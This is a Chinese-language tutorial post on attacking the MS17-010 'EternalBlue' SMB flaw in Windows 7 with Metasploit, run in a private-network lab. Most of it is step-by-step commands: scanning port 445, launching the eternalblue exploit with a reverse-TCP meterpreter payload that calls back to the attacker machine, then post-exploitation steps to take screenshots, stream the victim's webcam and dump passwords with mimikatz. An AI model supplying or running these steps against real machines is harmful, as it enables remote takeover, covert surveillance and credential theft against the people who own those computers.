EternalBlue（永恒之蓝）漏洞

       今天就跟大家分享下刚刚学习到利用MSF框架快速搞定“MS017-010”漏洞。其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击，就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。

445端口简介：

       445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月，由于病毒"坏兔子"来袭，国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

准备：

1. Kali系统  版本：2.0   IP：192.168.0.129
2. Win7系统           IP：192.168.0.130   开放端口：445
3. MSF框架版本：4.14.17版本以上
4. 安装更新metasploit 

实战攻击：

Step1:查看MSF框架版本

在终端输入msfconsole

Step2: 安装更新metasploit

终端输入apt-get  install metasploit-framework

Step3:漏洞模块路经查询

在终端输入：search ms17-010

Step4：加载扫描模块

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.0.130       (靶机的IP)

exploit

 

Step5：加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set rhost 192.168.0.130 (靶机的IP)

set lhost 192.168.0.129 (发起攻击的主机IP)

set lport 443       (监听的端口)

 

Step6：发起攻击，成功会反弹shell

输入run或者exploit

 

Meterpreter功能展现

1.捕捉桌面：

meterpreter >screenshot

2.视屏开启

meterpreter > webcam_scream

kali会自动打开浏览器播放被攻击电脑的摄像头,被攻击者的摄像头也会亮起来

 

3.获取系统管理密码

Step1：载入mimikatz

meterpreter > load mimikatz

Step2:使用命令wdigest获取密码

Meterpreter功能有很多，这里就不一一的示范了，有兴趣的可以自己去测试下。